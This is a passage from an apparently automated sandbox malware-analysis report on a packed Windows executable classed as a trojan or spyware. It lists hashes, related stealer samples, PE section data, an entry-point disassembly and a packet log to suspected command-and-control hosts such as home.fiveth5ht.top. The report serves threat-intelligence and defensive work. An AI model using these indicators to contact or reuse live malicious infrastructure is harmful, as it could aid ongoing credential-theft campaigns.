                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:4
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:f7qbEfJl0B.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:01fbecb34b5ac1c9c3336c64817f1637.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: f7qbEfJl0B.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  09:12:48API Interceptor72x Sleep call for process: f7qbEfJl0B.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  34.226.108.1555KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                    dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                      OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                        ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                          BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                            5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                              3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                  8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                                    mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                                      5.101.3.2175KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                      dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                      BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                      OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                      NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                      EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                      PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                      qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                      4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                      xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      home.fiveth5ht.top5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      httpbin.orgE205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                      • 3.218.7.103
                                                      5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                      • 3.218.7.103
                                                      dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                                      • 34.226.108.155
                                                      ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                      • 34.226.108.155
                                                      BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                      • 3.218.7.103
                                                      NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                      • 3.218.7.103
                                                      EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                      • 3.218.7.103

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      PINDC-ASRU5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                      • 5.101.3.217
                                                      dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                      • 5.101.3.217
                                                      OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      AMAZON-AESUSE205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                      • 3.218.7.103
                                                      5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                      • 3.218.7.103
                                                      QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                      • 3.218.7.103
                                                      dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                                      • 34.226.108.155
                                                      ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                      • 34.226.108.155
                                                      BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                      • 34.226.108.155
                                                      db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                      • 34.195.210.183

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      No created / dropped files found

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                      Entropy (8bit):7.9850088221064475
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • VXD Driver (31/22) 0.00%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:f7qbEfJl0B.exe
                                                      File size:4'487'168 bytes
                                                      MD5:01fbecb34b5ac1c9c3336c64817f1637
                                                      SHA1:51f08b5cfb4d7c7c0bb96b8c0c171e3cf05e27ab
                                                      SHA256:828c90e4bd13605fdf955b30e36336ff08d5f10858f21fdf38529debdd216013
                                                      SHA512:117787a4cad5f04af82f0492dd6118bc4f2af2e1cb209d92aa8edf437ce11d6f27bda74d816fe7640f47b6bbeb3cefb98ff9707106edec227274d4ba3d33f2fb
                                                      SSDEEP:98304:u/jc2pRsx2Zwa0WBsFu7RPv6PPWucMdwQ05:uLcSOcZwaxiMRP8PWrMa75
                                                      TLSH:A4263328ABBADCA0D28B2EFAAED11D1552AD52074951820B0BBDB5F31DC7ED4CD5D00F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2...0....... I...@..........................`........D...@... ............................

                                                      File Icon

                                                      Icon Hash:90cececece8e8eb0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x1033000
                                                      Entrypoint Section:.taggant
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                      DLL Characteristics:DYNAMIC_BASE
                                                      Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                      Authenticode Signature

                                                      Signature Valid:
                                                      Signature Issuer:
                                                      Signature Validation Error:
                                                      Error Number:
                                                      Not Before, Not After
                                                        Subject Chain
                                                          Version:
                                                          Thumbprint MD5:
                                                          Thumbprint SHA-1:
                                                          Thumbprint SHA-256:
                                                          Serial:

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp 00007F7B216D8CAAh
                                                          orps xmm0, dqword ptr [eax+eax+00h]
                                                          add byte ptr [eax], al
                                                          add cl, ch
                                                          add byte ptr [eax], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [ecx], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], dh
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [ecx], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [ecx], al
                                                          add byte ptr [eax], 00000000h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          adc byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          or ecx, dword ptr [edx]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc30f780x10lrpylste
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc30f280x18lrpylste
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          0x10000x6db0000x288a0069e762bafc9fbe7ecb577ac5071266b5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x6dc0000x1ac0x2001fdb95bb60dc727bff8444ebeb5ff63aFalse0.580078125data4.555669507961507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          0x6de0000x3980000x20000fe6af17e892930437991d90e82b266unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          lrpylste0xa760000x1bc0000x1bb200c6211f864fa5d1d34e4fc8f5b79f5fcaFalse0.9943323563117066data7.95488352075432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          fpogxiqp0xc320000x10000x40038323e91c19ffcd0d5e2782f33eebe3aFalse0.72265625data5.683286921786855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .taggant0xc330000x30000x22000018d613104774110fae6725ee68e39bFalse0.050551470588235295DOS executable (COM)0.5029686698151392IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_MANIFEST0xc30f880x152ASCII text, with CRLF line terminators0.6479289940828402

                                                          Imports

                                                          DLLImport
                                                          kernel32.dlllstrcpy

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 27, 2024 15:12:21.631406069 CET49730443192.168.2.434.226.108.155
                                                          Dec 27, 2024 15:12:21.631459951 CET4434973034.226.108.155192.168.2.4
                                                          Dec 27, 2024 15:12:21.631545067 CET49730443192.168.2.434.226.108.155
                                                          Dec 27, 2024 15:12:21.642152071 CET49730443192.168.2.434.226.108.155
                                                          Dec 27, 2024 15:12:21.642163992 CET4434973034.226.108.155192.168.2.4
                                                          Dec 27, 2024 15:12:23.506653070 CET4434973034.226.108.155192.168.2.4
                                                          Dec 27, 2024 15:12:23.517199039 CET49730443192.168.2.434.226.108.155
                                                          Dec 27, 2024 15:12:23.517239094 CET4434973034.226.108.155192.168.2.4
                                                          Dec 27, 2024 15:12:23.518757105 CET4434973034.226.108.155192.168.2.4
                                                          Dec 27, 2024 15:12:23.518853903 CET49730443192.168.2.434.226.108.155
                                                          Dec 27, 2024 15:12:23.521169901 CET49730443192.168.2.434.226.108.155
                                                          Dec 27, 2024 15:12:23.521296024 CET4434973034.226.108.155192.168.2.4
                                                          Dec 27, 2024 15:12:23.545804977 CET49730443192.168.2.434.226.108.155
                                                          Dec 27, 2024 15:12:23.545814037 CET4434973034.226.108.155192.168.2.4
                                                          Dec 27, 2024 15:12:23.588757992 CET49730443192.168.2.434.226.108.155
                                                          Dec 27, 2024 15:12:23.937071085 CET4434973034.226.108.155192.168.2.4
                                                          Dec 27, 2024 15:12:23.937227964 CET4434973034.226.108.155192.168.2.4
                                                          Dec 27, 2024 15:12:23.937391996 CET49730443192.168.2.434.226.108.155
                                                          Dec 27, 2024 15:12:23.945137978 CET49730443192.168.2.434.226.108.155
                                                          Dec 27, 2024 15:12:23.945159912 CET4434973034.226.108.155192.168.2.4
                                                          Dec 27, 2024 15:12:25.886013031 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.005819082 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.006062984 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.007304907 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.127022982 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.127031088 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.127108097 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.127171040 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.127190113 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.127194881 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.127204895 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.127228975 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.127243996 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.127291918 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.127306938 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.127335072 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.127389908 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.127393961 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.127444029 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.127479076 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.127484083 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.127522945 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.127552986 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.246979952 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.247014999 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.247047901 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.247077942 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.247106075 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.247153044 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.247170925 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.247230053 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.247253895 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.247258902 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.247308016 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.290823936 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.290971994 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.411252022 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.411333084 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.454910994 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.454981089 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.574557066 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.662575960 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.662640095 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:26.906698942 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:26.906857967 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.055706978 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.055984974 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.056066036 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.176016092 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176024914 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176116943 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176121950 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176136017 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.176176071 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176187038 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.176225901 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176263094 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.176304102 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176305056 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.176378965 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.176413059 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176461935 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.176469088 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176572084 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.176615953 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176692009 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.176764011 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176769018 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176829100 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.176892996 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.176994085 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.177004099 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177038908 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177057028 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.177103043 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.177135944 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177207947 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177344084 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177388906 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177475929 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177556038 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177623987 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177634001 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177731037 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177778959 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177825928 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177886963 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.177937031 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.177989960 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.178003073 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.178066015 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.178210974 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.178236008 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.178277016 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.178302050 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.295986891 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.296091080 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.296094894 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.296181917 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.296210051 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.296262980 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.296509027 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.296669960 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.296783924 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.296937943 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297049999 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297075033 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297225952 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297321081 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297409058 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297590971 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297770977 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297776937 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297889948 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297894955 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297996044 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298042059 CET80497315.101.3.217192.168.2.4
